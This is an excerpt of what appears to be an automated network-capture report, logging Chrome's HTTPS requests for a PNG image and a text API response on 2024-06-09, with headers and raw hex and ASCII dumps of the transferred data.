                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 67 78 54 77 58 65 6c 4f 65 31 53 69 4b 45 46 35 43 50 38 2b 57 78 50 41 42 30 67 68 55 4a 41 51 45 64 34 42 58 53 55 38 6c 64 4a 6d 46 61 58 63 56 32 31 54 6a 4e 6a 71 62 2f 33 63 52 42 46 32 2f 52 39 4b 31 74 48 2f 6f 43 61 4c 6b 49 4d 56 63 55 39 78 67 4d 32 44 4c 45 4d 52 4d 32 75 55 44 4b 61 42 38 4c 6c 6f 62 33 7a 65 79 51 53 4e 51 78 76 41 77 6c 36 58 4b 69 44 77 56 48 57 66 4f 63 2b 43 4a 33 58 70 71 6e 61 6d 46 2b 6c 72 6c 72 71 49 50 34 64 65 45 6e 59 51 6f 65 46 56 59 41 55 6f 4c 52 6f 53 68 6a 49 51 38 78 6b 41 48 61 61 38 78 48 52 4c 49 57 53 46 35 41 70 75 4c 43 6c 4e 35 67 67 64 69 51 56 70 41 43 2f 73 36 33 4f 74 41 49 61 47 4e 35 2f 30 59 7a 74 30 33 74 55 4f 46 75 65 6d 73 4b 62 6b 4b 4b 51 50 54 38 4b 6a 79 52 75 6f 62 72 65 61 79 4d 6f
                                                                                                                                                          Data Ascii: gxTwXelOe1SiKEF5CP8+WxPAB0ghUJAQEd4BXSU8ldJmFaXcV21TjNjqb/3cRBF2/R9K1tH/oCaLkIMVcU9xgM2DLEMRM2uUDKaB8Llob3zeyQSNQxvAwl6XKiDwVHWfOc+CJ3XpqnamF+lrlrqIP4deEnYQoeFVYAUoLRoShjIQ8xkAHaa8xHRLIWSF5ApuLClN5ggdiQVpAC/s63OtAIaGN5/0Yzt03tUOFuemsKbkKKQPT8KjyRuobreayMo
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 56 79 7a 4f 5a 52 76 4c 39 5a 66 67 71 72 4a 63 59 41 45 46 54 2f 4b 74 41 4c 36 42 5a 70 63 43 4c 47 6b 6e 5a 4b 58 4a 5a 44 4b 64 37 50 2f 4b 66 4a 5a 35 4c 51 4b 45 6e 4b 66 41 4b 41 72 35 35 55 7a 4b 41 4a 41 46 4c 6c 35 66 33 4c 6a 75 53 51 71 68 35 51 70 6a 39 5a 53 46 4c 41 70 51 77 42 71 46 5a 50 4c 6a 70 53 6b 41 65 46 53 74 79 2b 46 65 53 4c 52 67 49 53 4b 68 46 57 76 4c 53 46 57 49 71 41 6e 6c 46 4c 43 52 64 49 71 6a 70 65 65 79 54 51 4e 33 4c 56 5a 65 41 71 2b 46 58 53 4b 45 50 43 6c 4c 51 49 4d 51 72 64 5a 57 51 72 52 73 58 46 4b 7a 46 54 6f 71 68 5a 65 65 79 37 51 4c 4e 4c 38 70 53 41 42 53 70 51 2f 4b 6b 35 61 36 42 36 46 51 4b 4a 53 70 64 4b 79 75 66 48 6f 51 79 45 65 4d 38 6e 4a 4e 38 42 35 38 4f 4d 39 42 75 44 6f 42 51 69 55 55 44 48 6a
                                                                                                                                                          Data Ascii: VyzOZRvL9ZfgqrJcYAEFT/KtAL6BZpcCLGknZKXJZDKd7P/KfJZ5LQKEnKfAKAr55UzKAJAFLl5f3LjuSQqh5Qpj9ZSFLApQwBqFZPLjpSkAeFSty+FeSLRgISKhFWvLSFWIqAnlFLCRdIqjpeeyTQN3LVZeAq+FXSKEPClLQIMQrdZWQrRsXFKzFToqhZeey7QLNL8pSABSpQ/Kk5a6B6FQKJSpdKyufHoQyEeM8nJN8B58OM9BuDoBQiUUDHj
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 7a 71 4e 70 79 41 41 59 37 6c 41 41 47 41 75 67 41 44 46 56 51 41 42 6f 52 68 30 34 34 36 38 53 32 49 6d 79 59 7a 7a 57 62 52 70 31 67 50 4c 35 62 55 43 7a 79 37 77 30 72 59 4f 58 64 4f 48 2f 64 65 6e 62 64 66 63 6d 67 46 77 78 76 30 6d 57 77 35 47 57 57 37 47 57 46 4b 32 6a 47 5a 6c 54 37 71 2b 70 54 48 37 74 73 39 6c 56 30 2f 52 36 33 6e 57 54 71 6a 49 59 39 76 74 51 69 4d 59 39 43 38 42 57 35 67 48 6c 65 41 77 36 33 6d 33 71 4f 51 71 6e 30 67 4f 39 6d 59 57 36 75 58 49 32 35 32 6e 38 4f 57 65 33 31 30 50 70 4a 6b 32 39 70 42 44 72 76 54 41 64 67 4e 4d 48 79 34 48 58 58 59 43 41 50 68 51 4f 37 41 5a 50 30 42 68 41 48 66 41 66 49 37 38 44 79 5a 59 4c 75 4b 63 4c 49 4f 7a 4e 6b 48 4e 5a 45 33 53 47 33 74 32 4c 4b 38 4a 79 39 44 35 77 76 59 68 37 59 4a 74
                                                                                                                                                          Data Ascii: zqNpyAAY7lAAGAugADFVQABoRh04468S2ImyYzzWbRp1gPL5bUCzy7w0rYOXdOH/denbdfcmgFwxv0mWw5GWW7GWFK2jGZlT7q+pTH7ts9lV0/R63nWTqjIY9vtQiMY9C8BW5gHleAw63m3qOQqn0gO9mYW6uXI252n8OWe310PpJk29pBDrvTAdgNMHy4HXXYCAPhQO7AZP0BhAHfAfI78DyZYLuKcLIOzNkHNZE3SG3t2LK8Jy9D5wvYh7YJt
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 36 57 47 62 64 6f 6c 47 5a 47 47 61 51 4b 6b 30 37 57 48 42 66 67 38 68 4b 35 44 4d 50 6f 78 68 43 57 46 55 69 6f 43 49 69 64 79 47 4b 6b 5a 68 4d 2f 49 38 6d 4f 38 63 49 70 6a 76 48 46 4b 59 55 51 70 41 31 69 30 79 35 41 41 34 2b 50 63 4b 38 43 47 5a 41 4b 4a 68 61 61 48 49 49 56 49 41 54 32 48 33 59 62 78 68 64 32 47 73 50 4b 30 41 6b 30 69 43 37 4f 79 68 77 2b 43 45 49 5a 35 68 4f 6d 48 41 59 53 49 63 4f 30 37 45 6f 52 52 32 68 52 43 62 4c 74 56 4f 4a 41 44 6b 41 47 5a 68 36 4f 47 4a 78 50 43 36 71 61 5a 63 2b 4f 79 68 77 42 77 77 34 58 77 6f 5a 6d 46 77 34 55 70 41 6e 32 48 50 77 45 68 47 6a 67 4c 6c 77 49 66 41 4f 65 5a 30 67 56 6a 68 65 69 69 50 5a 75 51 57 69 4a 68 63 2b 4a 4f 68 59 43 71 74 45 4f 33 73 58 52 43 32 6b 44 39 68 59 2f 62 73 41 4f 4f
                                                                                                                                                          Data Ascii: 6WGbdolGZGGaQKk07WHBfg8hK5DMPoxhCWFUioCIidyGKkZhM/I8mO8cIpjvHFKYUQpA1i0y5AA4+PcK8CGZAKJhaaHIIVIAT2H3Ybxhd2GsPK0Ak0iC7Oyhw+CEIZ5hOmHAYSIcO07EoRR2hRCbLtVOJADkAGZh6OGJxPC6qaZc+OyhwBww4XwoZmFw4UpAn2HPwEhGjgLlwIfAOeZ0gVjheiiPZuQWiJhc+JOhYCqtEO3sXRC2kD9hY/bsAOO
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 72 58 6c 4c 65 51 72 51 57 2f 47 4f 2b 4b 65 63 76 58 6c 6e 41 4b 4e 35 6a 66 46 47 6f 45 64 35 49 33 6b 7a 65 51 37 78 34 63 67 58 65 61 71 5a 56 33 6c 6e 41 4e 46 77 52 33 6e 69 41 4b 75 52 63 79 72 63 33 74 4a 49 37 33 6d 72 65 64 56 35 61 4f 47 2b 41 47 30 45 72 46 7a 6d 5a 74 41 52 52 47 49 31 67 42 7a 51 68 48 7a 42 38 49 4d 51 53 38 34 46 51 50 74 41 32 78 54 4e 51 49 4f 55 4b 53 67 32 73 4a 4e 41 4b 55 44 57 6c 4b 4a 53 6f 6d 43 69 6a 6f 50 57 62 31 6d 70 57 61 43 4b 6f 64 6e 47 42 4b 33 34 6a 34 4b 4e 37 6d 4f 2b 30 63 77 4c 64 42 70 55 6d 38 41 51 76 42 6a 35 76 41 44 37 34 68 70 55 30 37 45 4f 33 4d 78 5a 36 49 4a 45 2b 63 45 41 4a 50 6e 36 67 68 70 55 44 4d 5a 6c 61 62 41 6f 4c 62 6c 64 69 66 36 5a 6a 61 43 34 2b 62 56 67 4f 6b 41 38 71 4f 75
                                                                                                                                                          Data Ascii: rXlLeQrQW/GO+KecvXlnAKN5jfFGoEd5I3kzeQ7x4cgXeaqZV3lnANFwR3niAKuRcyrc3tJI73mredV5aOG+AG0ErFzmZtARRGI1gBzQhHzB8IMQS84FQPtA2xTNQIOUKSg2sJNAKUDWlKJSomCijoPWb1mpWaCKodnGBK34j4KN7mO+0cwLdBpUm8AQvBj5vAD74hpU07EO3MxZ6IJE+cEAJPn6ghpUDMZlabAoLbldif6ZjaC4+bVgOkA8qOu
                                                                                                                                                          2024-06-09 22:41:11 UTC13242INData Raw: 43 30 69 44 72 6a 74 74 43 32 30 4d 62 51 2f 45 7a 4b 33 56 42 49 35 74 34 30 44 71 62 56 31 74 47 36 31 78 7a 63 4a 74 44 6d 32 74 62 52 32 74 51 32 33 52 32 4e 71 41 37 6d 33 62 72 64 65 6b 58 6d 33 6e 51 50 64 74 6c 64 68 74 72 63 39 74 55 30 44 46 62 55 6c 41 37 32 30 78 6e 4f 73 74 68 57 33 55 62 59 35 74 75 6e 6f 49 72 61 6a 38 41 6d 33 41 72 54 33 56 64 56 6a 4d 72 66 6c 35 77 71 30 70 51 4b 44 74 6e 31 67 75 62 51 31 74 57 36 42 74 31 58 33 56 30 4f 33 63 62 57 74 74 6e 68 6c 6e 62 62 46 74 59 4f 32 49 37 51 78 74 52 4b 31 32 62 54 64 74 55 57 30 43 6b 4a 4f 74 59 4f 30 4d 62 59 79 74 76 36 32 73 72 5a 5a 74 75 61 33 77 37 5a 7a 59 44 47 31 38 72 64 44 74 66 57 30 59 37 59 71 55 4a 4f 32 66 57 41 78 74 55 44 57 5a 62 59 39 41 4d 6d 30 4c 41 50 70
                                                                                                                                                          Data Ascii: C0iDrjttC20MbQ/EzK3VBI5t40DqbV1tG61xzcJtDm2tbR2tQ23R2NqA7m3brdekXm3nQPdtldhtrc9tU0DFbUlA720xnOsthW3UbY5tunoIraj8Am3ArT3VdVjMrfl5wq0pQKDtn1gubQ1tW6Bt1X3V0O3cbWttnhlnbbFtYO2I7QxtRK12bTdtUW0CkJOtYO0MbYytv62srZZtua3w7ZzYDG18rdDtfW0Y7YqUJO2fWAxtUDWZbY9AMm0LAPp


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          356192.168.2.55012190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC372OUTGET /pc/image-pc/index/312/app/03.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:10 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 325680
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:26 GMT
                                                                                                                                                          ETag: "5d71fe6a-4f830"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[1],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE14[20],EU-GER-frankfurt-GLOBAL1-CACHE5[0,TCP_HIT,15],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 30ba31df032219d9ae3c813153b94d22
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893226
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:10 UTC15756INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 86 00 00 04 48 08 06 00 00 00 9f b8 10 87 00 00 20 00 49 44 41 54 78 5e ec 7d 09 98 24 45 95 ff 8b cc ac aa 3e a7 af 39 ba e7 6a 06 18 60 1c 05 95 11 f0 00 64 95 f5 53 d6 03 8f 11 75 45 70 5d 51 44 3c 16 f0 5c c5 6b 5d f0 c6 dd f5 d8 f5 f8 ab e0 7d a0 a8 2b 1e 78 ef ae 3b e8 a2 8e 1c c3 d5 73 f6 1c 3d d3 3d 7d 55 55 1e f1 ff 7e 2f 22 32 b3 b2 aa 3a ab ba ba 67 ba 67 2a f9 e6 2b ba 2a 33 32 e2 45 c4 8b df bb 05 35 af 79 a0 80 14 f7 dc 73 a0 63 a0 3d 9b 71 6d 77 85 cc 38 ad 36 89 01 4f ca 36 cb a1 93 a4 14 6d 96 65 af 14 44 2d 42 50 bf 14 94 25 49 dd 24 28 43 52 b4 11 91 2d 84 cc 91 24 4b 12 d9 44 24 4c 27 65 f8 7f fa 1b 89 9f a3 ab ec f7 94 d1 09 f2 e7 61 fc 8b a7 49 29 65 43 9d 15 22 39 21 0d 35 b7
                                                                                                                                                          Data Ascii: PNGIHDRH IDATx^}$E>9j`dSuEp]QD<\k]}+x;s==}UU~/"2:gg*+*32E5ysc=qmw86O6meD-BP%I$(CR-$KD$L'eaI)eC"9!5
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: bc 03 10 a5 ec 16 dd 89 e9 62 f1 b6 42 7e 62 c8 13 53 1f bc 60 d3 99 23 cd 00 94 b9 59 f5 f3 dd ca 82 02 86 00 85 7f fc e3 de b6 de de d6 01 ab 45 7c 90 28 58 eb d8 ce c6 8c 6d 67 15 30 54 be 83 c8 ef 87 8b b5 86 3a 32 17 9a 32 00 43 95 a6 a6 32 d9 cc f7 ec 43 01 f5 77 e0 d3 2f ee f8 19 03 a7 77 bf fb dd ac a1 03 e0 31 e6 8f 4a ad a4 1d 84 71 46 0f 5f b9 5f fd ea 57 73 0a 0c c1 c8 60 d2 78 ea 53 9e 4a 27 9e 74 22 fb 16 a2 cf cf 7b fe f3 98 21 20 ff e2 8a e5 2b e8 ec 73 ce 66 4d e8 cb 2e 7d 19 ed dd b7 97 cd d7 30 81 c0 b4 dc d5 dd c5 26 07 30 01 80 3a b4 79 da 86 d3 d8 e4 fd 85 ff f7 05 66 e0 08 5e c9 e7 51 03 5d e5 34 44 b4 35 7c 0a 39 b9 b8 65 b1 6f 63 5f 6f 1f 6d 7e e1 66 66 80 d0 86 c2 d7 e6 c6 0f dc 48 a3 87 46 69 e4 e0 81 04 f9 aa 2d b5 08 18 32 b8
                                                                                                                                                          Data Ascii: bB~bS`#YE|(Xmg0T:22C2Cw/w1JqF__Ws`xSJ't"{! +sfM.}0&0:yf^Q]4D5|9eoc_om~ffHFi-2
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 13 06 5b 63 78 35 05 a9 7a c5 54 60 89 03 ba fa 0d 32 20 83 dd 70 c1 cd d8 42 33 c3 ed 31 d5 d7 d1 5d 3b 81 5e 12 74 19 80 99 de ef 91 b1 2d 17 0b d4 78 c2 47 12 c1 55 cd c7 95 c5 c4 82 8e c0 d8 a7 8e 47 64 7d 63 53 0e 0e da 4c 73 1e 76 da 64 b8 cc a2 88 c1 c9 f3 42 b3 f3 b7 b9 9c b5 48 e1 e7 db 73 e1 06 ce 74 b5 b1 26 d5 fd 9e 29 66 57 98 62 e9 67 bf 47 b8 31 8f 59 60 68 c0 df 07 ef 3e c3 65 e0 20 cb 50 1e 07 08 ef b4 d1 18 b9 0e 3b 13 64 2d 8c c8 73 ac 8b f9 21 c7 bb 51 2d c9 fc cc 14 59 c3 5e a4 55 9d e6 5d 88 40 87 ea d9 5b ab 6b d2 ea 45 b2 b1 bd ef 0a 24 74 de 20 30 fa c7 91 4d 1d c0 a3 a7 19 f6 d7 0c 06 66 af 4a 9f 0c a4 2b 8c b2 8d 46 3e a7 16 50 96 b1 80 a1 3a d6 1f cc 2f 00 45 f3 c6 34 60 e8 b3 c3 09 70 b9 f3 c6 c0 3f 7f 7f 7d 18 35 8e fe d5 ea
                                                                                                                                                          Data Ascii: [cx5zT`2 pB31];^t-xGUGd}cSLsvdBHst&)fWbgG1Y`h>e P;d-s!Q-Y^U]@[kE$t 0MfJ+F>P:/E4`p?}5
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 54 a3 6b 63 bc c1 74 95 fe 99 f7 59 ba b2 d7 69 b3 30 ac 51 47 a5 fc b4 7c d7 77 ff 2d a6 d5 b1 a9 c4 ad 81 33 03 36 76 78 5e c0 d8 43 62 83 d4 70 0e 05 4a c3 50 26 6a 15 29 e6 22 d9 dd 5c a7 2d d3 ce d6 ba 14 c8 80 22 95 8b e7 a8 43 df d7 30 84 66 17 c5 1a 0a b3 21 2b c0 bc d3 8a 7a 05 66 a9 e7 c8 d8 3b ce b1 a4 55 63 76 96 80 d9 f7 e7 8e 82 42 f5 5f 24 08 f4 ec 76 38 ac b0 2b 72 60 92 23 e3 7a c7 a3 5a 5b c1 a9 1a 55 c7 40 d5 49 53 d8 ca 10 1b a0 3c 9c 30 a0 17 d6 f5 86 72 16 fc 8f 15 c9 a8 08 2f 51 a6 81 cd 0b 18 45 82 55 4a 17 0c 14 a6 7d 41 63 60 08 af db 94 0d 92 5e 69 cc 72 5b 5f 70 cb c4 0d 90 09 41 15 fa 40 a6 a6 97 e5 17 fe 87 a7 a3 99 85 b3 32 37 af a9 64 fd 2c e8 96 ef 33 86 c7 ac 2c 6f a8 5f bf a1 19 43 f3 19 a3 d7 9a b3 ab f9 3b ef fb 09 b9
                                                                                                                                                          Data Ascii: TkctYi0QG|w-36vx^CbpJP&j)"\-"C0f!+zf;UcvB_$v8+r`#zZ[U@IS<0r/QEUJ}Ac`^ir[_pA@27d,3,o_C;
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: a5 34 e2 b8 f4 46 48 7f de 5c 7f 26 2e fc 62 aa 5a 5f 20 f5 d0 8d 7c 7b 94 73 2d eb 31 7a 59 20 66 89 93 53 6f 6a 1a 8b 4e 44 f3 84 f6 6a 04 0c eb d0 ac cf c3 b7 be e6 bb 61 7a 72 19 9e 78 fc d5 e4 1d 70 bd 18 56 ef 5e 81 8f 7e e2 8f e0 ce dd 4b 70 e3 f6 05 9c 65 00 9e 88 a9 e6 83 fb c3 66 af 76 ea 01 49 c6 a0 a5 5f 92 e7 ca 78 00 b2 6d 9f 65 20 59 c0 3f db 63 b6 18 53 bd 7f b9 4d f4 d0 80 dd 62 f0 cb ce af f4 fd 47 0b 9d 30 bd 4f 59 41 7b d3 7b 12 38 94 12 37 c3 84 f5 b9 7f 19 18 66 d4 0b 62 0f fa 41 0c 53 33 c7 e0 27 9f fc 55 02 86 f3 f3 58 12 6f cc 18 8e 3a 2e 1e f4 f3 0f 24 30 dc 68 5d a0 a4 13 32 2e d2 a5 65 13 1e d5 3b 7a af 80 21 66 25 a3 2b 59 00 c3 2a dc bc be 0a 6b ab 2d 78 ea a9 af 50 ac d0 d2 f2 1c 34 26 ab f0 a6 37 7f 1b 4c 4d d7 a0 dd 6e 41
                                                                                                                                                          Data Ascii: 4FH\&.bZ_ |{s-1zY fSojNDjazrxpV^~KpefvI_xme Y?cSMbG0OYA{{87fbAS3'UXo:.$0h]2.e;z!f%+Y*k-xP4&7LMnA
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 79 31 01 39 8f fe 87 70 ce 23 60 e8 f5 27 48 0e 69 6a ea 30 04 a1 0f 17 af 5d 81 ad 6e 0b 5a ed 1b e0 d6 3a f0 f8 b7 3c 04 51 dc 1d 03 43 d9 c0 63 60 28 e7 d1 18 18 96 31 75 07 f6 9c 7d 0f 0c 79 a7 c6 8c e1 ff f5 a1 df 26 b9 1a 01 0c 63 a8 fa 22 d8 5f 3f a8 a6 b0 e2 da d1 8b ad 17 fe 46 61 92 04 70 90 9a 7a 43 32 83 f5 05 d1 f6 b7 2e 80 bb f3 e4 82 e1 ae f4 64 a7 8b 8c ad d4 c7 63 65 7b 04 2f 2f 39 f3 38 44 a1 03 17 cf df 82 8d f5 2d b8 76 fd 0a d4 9b 0e 1c 3b 31 07 f5 46 05 ba ed 61 ee 7a 73 c1 7b d5 c5 4b 4c b0 cc 8c 53 d9 bd a1 7d 80 8c 88 04 6c d4 a6 86 18 c3 58 ee 98 d5 40 7f f5 ba 19 c6 96 24 61 b2 72 2c 6a eb 09 f6 45 7c 82 f2 31 28 db b3 72 e4 28 65 68 57 aa 75 02 7e e7 cf 3d 0f 83 60 00 33 33 33 e4 d6 46 dd 41 f4 5a 6f 6c 6e d0 ef 28 61 54 be af
                                                                                                                                                          Data Ascii: y19p#`'Hij0]nZ:<QCc`(1u}y&c"_?FapzC2.dce{//98D-v;1Fazs{KLS}lX@$ar,jE|1(r(ehWu~=`333FAZoln(aT
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 7d 01 ed f6 32 1c db cb 62 a6 58 3d f2 a6 88 1b 73 d1 b5 9c ac a8 13 df e8 24 62 0c 05 d7 b1 ea b8 74 9c f9 e6 34 cc 4a f6 ce 24 4d 5a 8a 31 a4 ac e4 89 89 03 28 55 66 86 31 86 2b 9d 1c 9b f8 ba 6d 02 0c 7d 1d 43 5f ae 66 7e fe 22 1c 50 75 10 07 77 9d 31 e4 20 8e fe ec 93 40 74 17 86 6e a2 50 28 c3 d4 2b 78 ff fb 3e 88 a9 c9 9d b8 7d 6b 09 cd 46 07 a7 4f 9f 66 06 e9 bd ef 7b 37 2c bb 89 d3 a7 9e 45 a3 39 87 4e 77 09 6e bf 1b ca c3 10 b8 4a 61 0c a9 64 51 d4 98 c7 0c 2f 65 1c 73 83 41 f1 8e 5a 11 96 a5 a1 db 2a e2 6f ff e6 14 7a 5d 1d cb 5d 1b f5 22 70 ff 03 fb 50 1b d1 30 3d 55 f7 81 e1 e1 00 18 b6 db 0d 9c 3e fd 12 03 86 3c 2b 99 cf 91 b4 85 c4 73 b5 79 06 91 98 2a ce 4e 11 7b 4a 9a 59 14 20 4e ff 2f 73 6f 26 e6 9f 0f 0e 09 d4 89 0b 4b e6 7b f8 37 bd d3
                                                                                                                                                          Data Ascii: }2bX=s$bt4J$MZ1(Uf1+m}C_f~"Puw1 @tnP(+x>}kFOf{7,E9NwnJadQ/esAZ*oz]]"pP0=U><+sy*N{JY N/so&K{7
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 1b 91 ac 5b b0 84 fa c2 e7 5a dd 2e c1 cb 95 cb 7b 04 f9 1c b8 93 6d 96 f0 d6 03 43 57 d0 39 79 53 1e 35 0f d2 d6 bc eb 42 be d3 81 21 57 41 f1 10 32 20 82 d7 a3 e6 e7 5e 6d e1 db 0d 0c 47 b5 d7 05 de 58 33 f6 2b ce 90 ed 0e f2 d2 e7 f3 8d cc c3 1c d1 b0 c0 31 be a7 cf e0 10 57 a7 ad ed 3e f9 03 61 c9 f0 3f bc 24 c6 50 18 c3 07 1f 5c a3 72 35 43 6b 07 67 28 57 18 50 a7 b5 45 83 a1 4f d9 2c c2 4a 2c 31 7d a3 23 1a 3e df 8d 01 43 b7 f6 70 0c 00 a6 d6 86 4e ee 8f 98 1c 8e c3 b0 6a 7b f5 b2 31 dd d1 d8 c1 3c 7a 9f 9b b5 cf b1 fd 65 4c a2 22 f8 9e ab 0b 9a 92 95 1c d0 1f 18 3b a3 63 c8 8c a1 e7 49 ad e4 4f fd a6 bf b4 fc 0e 9a 5e 3a 24 c0 10 53 20 23 31 e8 fb 31 86 a3 56 fd 9d ff fe 3d 0e 0c c1 36 39 82 cf 77 29 30 0c 32 ed 02 c6 30 d9 a0 41 b7 d0 66 2f 94 35
                                                                                                                                                          Data Ascii: [Z.{mCW9yS5B!WA2 ^mGX3+1W>a?$P\r5Ckg(WPEO,J,1}#>CpNj{1<zeL";cIO^:$S #11V=69w)020Af/5
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 4c 8e 64 4c c9 4f b9 fb be 2b 79 d4 28 dc 99 ef df 73 c0 f0 d3 9f fa 3b b4 ce b5 92 a1 ab 25 81 d6 ca 18 72 b9 24 15 d2 35 e3 a9 27 4d 3b c8 3f 6d a8 71 bd 10 18 22 41 23 aa d9 87 45 85 97 0a e5 8a fb 4e 4e c8 92 74 21 15 5d e4 7d a9 85 aa 00 50 93 3e 18 1c d8 f2 1d 56 63 70 1d b0 42 00 86 ca e0 a8 a6 19 1b 51 96 bd 30 a5 cd 9c 87 e0 2c 46 8e 47 8a 4a a1 a8 9b 16 31 5c c8 52 84 28 af 00 0e 31 dc 76 25 0c 16 ef 6d b4 19 f8 05 1e a0 e0 94 2d c6 4d 2b 3e 68 dc 96 30 21 00 32 60 43 7c de 44 20 98 8c e0 7d 49 e2 50 17 9a 80 65 7b 43 16 26 0d 59 c6 21 b0 d4 92 6d f2 bc f1 f8 1b 81 75 61 09 b3 80 d9 cb 20 3b ba 40 eb 1b 3b d4 ed 0c e8 fc f9 0d 6a f7 31 56 c2 ff e9 8b e3 24 1d 60 58 28 64 a8 c4 c0 30 4b dd 6e db 80 42 01 87 92 38 11 26 8c 00 2c e1 19 66 66 e6 1c
                                                                                                                                                          Data Ascii: LdLO+y(s;%r$5'M;?mq"A#ENNt!]}P>VcpBQ0,FGJ1\R(1v%m-M+>h0!2`C|D }IPe{C&Y!mua ;@;j1V$`X(d0KnB8&,ff
                                                                                                                                                          2024-06-09 22:41:11 UTC16384INData Raw: 29 76 76 77 05 55 81 cb 0b 0b 1c 77 1b 9b 70 09 b0 c0 c4 74 b8 26 62 04 6e 16 18 e2 5e e0 05 af 44 f5 ce f3 a9 e1 43 85 85 00 bd 05 6f 3b c8 2c 38 f5 74 01 b5 be 7c 8e a5 76 94 bc dd 44 42 1e 79 e8 61 19 1e 18 94 ff e6 03 ff 35 bd f5 20 f1 69 7a ba e1 44 a3 cd f9 73 17 79 5d c1 10 e2 3e 6f 6f 15 65 b7 52 96 7f ff d4 bf e7 f1 5e bc 3c cf 4a c5 fa f6 26 59 e2 de f9 38 95 4c 77 01 43 30 95 d9 4c 4a 56 af ce 4b 2a de 92 74 a2 25 69 c7 93 6c 2a 26 99 64 4b 6a 95 ab 92 4a d5 25 93 69 49 c6 c5 78 c1 3c e4 c8 ea 62 51 3c 3f 23 4d cf 11 4f d2 b2 b5 59 e6 18 80 66 32 95 e9 c8 d0 70 46 2a 8d 8e 3c ff 4a 59 76 2a 22 8d ba aa 31 06 06 91 e2 92 91 bb ee ba 5b d2 99 82 2c 6f ee c9 d2 46 49 5e bb 70 91 e9 24 a3 e3 93 1c 73 23 43 90 3a c4 e5 ec 99 53 c1 f5 8f 6a 57 75 de
                                                                                                                                                          Data Ascii: )vvwUwpt&bn^DCo;,8t|vDBya5 izDsy]>ooeR^<J&Y8LwC0LJVK*t%il*&dKjJ%iIx<bQ<?#MOYf2pF*<JYv*"1[,oFI^p$s#C:SjWu


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          357192.168.2.550130163.181.92.2264434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:10 UTC365OUTGET /ocs/zbw?r=7649153494 HTTP/1.1
                                                                                                                                                          Host: ocsapi1961.hydqef.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          Accept: */*
                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:11 UTC487INHTTP/1.1 200 OK
                                                                                                                                                          Server: Tengine
                                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                          Connection: close
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:10 GMT
                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          Api-Elapsed: 0.0000
                                                                                                                                                          X-Node: outer
                                                                                                                                                          X-Via: 1.1 aws:jp (Cdn Cache Server V2.0), 1.1 ocsapi:00 (Cdn Cache Server V2.0)
                                                                                                                                                          Via: cache22.l2hk3[6,0], cache32.l2sg3[43,0], ens-cache5.de5[245,0]
                                                                                                                                                          Timing-Allow-Origin: *
                                                                                                                                                          EagleId: a3b55c9917179728708555037e
